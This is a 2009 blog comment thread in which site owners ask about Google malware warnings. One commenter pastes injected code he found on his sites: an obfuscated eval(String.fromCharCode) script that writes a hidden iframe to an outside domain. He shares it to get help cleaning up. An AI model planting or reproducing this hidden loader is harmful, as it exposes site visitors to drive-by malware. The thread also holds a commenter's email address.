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9 comments :

Abdelrahman Ellithy said...

gr8
thanks
lot of people i know needed that

14 August 2009 at 20:55
elamb said...

so far, I haven't had any problems with the google "flagging of infected sites" in fact, its been helpful

15 August 2009 at 23:07
patelromal said...

Please remove "this site is harmful for your computer" message from google web search. There is no virus in my website rutwa.org.

20 August 2009 at 00:40
Tanksystems Designer said...

my site was hit by html framer which seemed to lead to other problems malware, badware etc.
I tried cleaning a copy, dumping the server and relaunching and the damn thing came back.
Any ideas or recommendations would be appreciated. GvonV

20 August 2009 at 10:34
Tracey said...

y blog site came up with malmare detected i need to get rid of it how please tell me its driving me crazy

26 August 2009 at 19:23
patelromal said...

Please remove "this site is harmful for your computer" message from google web search. There is no virus in my website rutwa.org.

26 August 2009 at 23:20
Unknown said...

I have been using google chrome for a long time and found it excellent at advising sites that are unsafe. So having this facility is excellent and will be very helpful, thank you google. G

17 September 2009 at 14:02
Unknown said...

My websites: exposure271.com, westcoastdish.com, jaydelucretia.com, and portlandrecording.com have been triggering some error regarding "karlast.com"... says my site might contain malware. It is sending viewers of my sites running for the hills. I found some code that was added to my site... I removed it. How do I keep from my future sites being listed with these errors. after i erased the code from the sites, I added an additional domain to my hosting. I have changed my password since the undesired code appeared on my sites, yet somehow my new domain is setting off alarms... It doesn't have any code added to it like the others...

Anyways, here is the code i found on mostly files titled "index.___". I really have no idea what it does, but if you could tell me, that'd be great. Here it is:

<&php require(DIR_WS_INCLUDES . 'application_bottom.php'); &> <&php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,103,103,51,61,34,107,34,59,118,97,114,32,119,61,34,97,114,108,97,34,59,118,97,114,32,114,101,54,61,34,115,116,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,51,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,113,113,112,39,43,39,47,39,43,39,34,32,115,116,121,108,101,61,34,100,105,39,43,39,115,112,108,97,121,58,110,111,110,39,43,39,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,52,48,48,52,48,48,48,48,48))'; &>



Thank you in advance for your help :)

-Derek

derek@exposure271.com

5 October 2009 at 04:45
Unknown said...

* Please note that my last somment contained the code from my "issue" and was not sent to infect anyone (i dont think it could, but i know nothing of javascript) I just really need some advice here and to get my sites off the list of "bad" thanks

5 October 2009 at 04:47

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